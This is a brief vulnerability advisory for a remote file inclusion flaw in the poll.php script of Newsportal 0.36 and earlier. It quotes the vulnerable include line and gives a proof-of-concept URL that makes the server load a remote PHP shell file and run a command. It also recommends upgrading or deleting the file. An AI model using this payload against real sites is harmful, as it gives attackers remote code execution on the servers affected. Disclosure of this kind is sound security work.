Newsportal <= 0.36 Remote File Inclusion Vulnerability=0D
=0D
[+] Affected Software: Newsportal <= 0.36 + register_globals=on=0D
[+] Vendor: http://florian-amrhein.de/newsportal=0D 
[+] Contact. philipp.niedziela@gmx.de=0D 
[+] Vuln discovered by: Florian Amrhein=0D
[+] PoC by: Philipp Niedziela=0D
=0D
// CODE [newsportal]/extras/poll/poll.php --------------------------------------------=0D
=0D
=0D
=0D
=0D
=0D
=0D
Lese Overview- und Artikeldaten ein...
=0D
=0D
 VULN=0D
include("$file_newsportal");=0D
// <----- VULN=0D
=0D
$ns=OpenNNTPconnection($server,$port);=0D
flush();=0D
if ($ns != false) {=0D
$headers = readOverview($ns,$group,1,true);=0D
closeNNTPconnection($ns);=0D
}=0D
?>=0D
=0D
=0D
=0D
=0D
=0D
// CODE --------------------------------------------=0D
=0D
=0D
[+] PoC:=0D
=0D
http://[url]/[pathtonewsportal]/extras/poll/poll.php?file_newsportal=http://localhost/phpshell.txt?cmd=uname -a=0D 
=0D
[+] Solution: Upgrade to 0.37 || del. [newsportal]/extras/poll/poll.php=0D
[+] Greets: Lenni :)=0D
=0D